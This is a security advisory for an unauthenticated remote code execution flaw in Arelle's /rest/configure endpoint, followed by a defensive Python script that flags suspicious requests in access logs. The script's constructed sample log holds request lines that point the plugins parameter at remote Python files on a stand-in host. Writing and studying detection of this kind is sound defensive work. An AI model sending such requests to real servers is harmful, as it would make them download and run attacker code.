CVE-2026-42796: Arelle before 2.39.10 allows malicious code execution
Summary
An unauthenticated attacker can make the Arelle webserver download and run attacker-controlled Python code, potentially gaining control of the system. This is a serious issue because it allows unauthorized access and could lead to data theft or system compromise. Update Arelle to version 2.39.10 or later to fix this vulnerability.
Original title
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manag...
Original description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
NVD CVSS 3.1
9.8
NVD CVSS 4.0
9.2
Vulnerability type
CWE-306
Missing Authentication for Critical Function
Published: 4 May 2026 · Updated: 30 May 2026 · First seen: 4 May 2026
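
A log check for the request pattern in the description above, as an added example that is not part of the advisory or of Arelle's own code. It assumes access logs in combined log format (for instance from a reverse proxy in front of the Arelle webserver); the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/May/2026:10:01:12 +0000] "GET /rest/configure?plugins=https%3A%2F%2Ffiles.example.net%2Fp.py HTTP/1.1" 200 41
10.0.0.5 - - [04/May/2026:10:02:40 +0000] "GET /rest/configure?plugins=localPlugin HTTP/1.1" 200 38
10.0.0.5 - - [04/May/2026:10:03:02 +0000] "GET /index.html HTTP/1.1" 200 912
203.0.113.9 - - [04/May/2026:10:04:55 +0000] "POST /rest/configure?PLUGINS=http://files.example.net/q.py HTTP/1.1" 200 41
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) HTTP/[\d.]+"')
# A plugins value that points at a remote location rather than a local name.
REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)


def scan(log_text):
    """Return (client, severity, plugin_values) for each /rest/configure
    request that carries a plugins query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if parts.path.rstrip("/").lower() != "/rest/configure":
            continue
        # parse_qs percent-decodes values, so encoded URLs are caught too.
        # Parameter name is compared case-insensitively to stay conservative
        # (assumption: the server's own matching rules are not on the page).
        params = parse_qs(parts.query, keep_blank_values=True)
        values = [v for k, vs in params.items()
                  if k.lower() == "plugins" for v in vs]
        if not values:
            continue
        remote = any(REMOTE_RE.search(v) for v in values)
        findings.append((client, "remote-url" if remote else "plugins-param", values))
    return findings


if __name__ == "__main__":
    for client, severity, values in scan(SAMPLE_LOG):
        print(f"{severity:14} {client:15} {values}")
```

A `remote-url` hit on a server running a version before 2.39.10 warrants treating the host as potentially compromised; `plugins-param` hits from unexpected clients are worth reviewing because the endpoint requires no authentication.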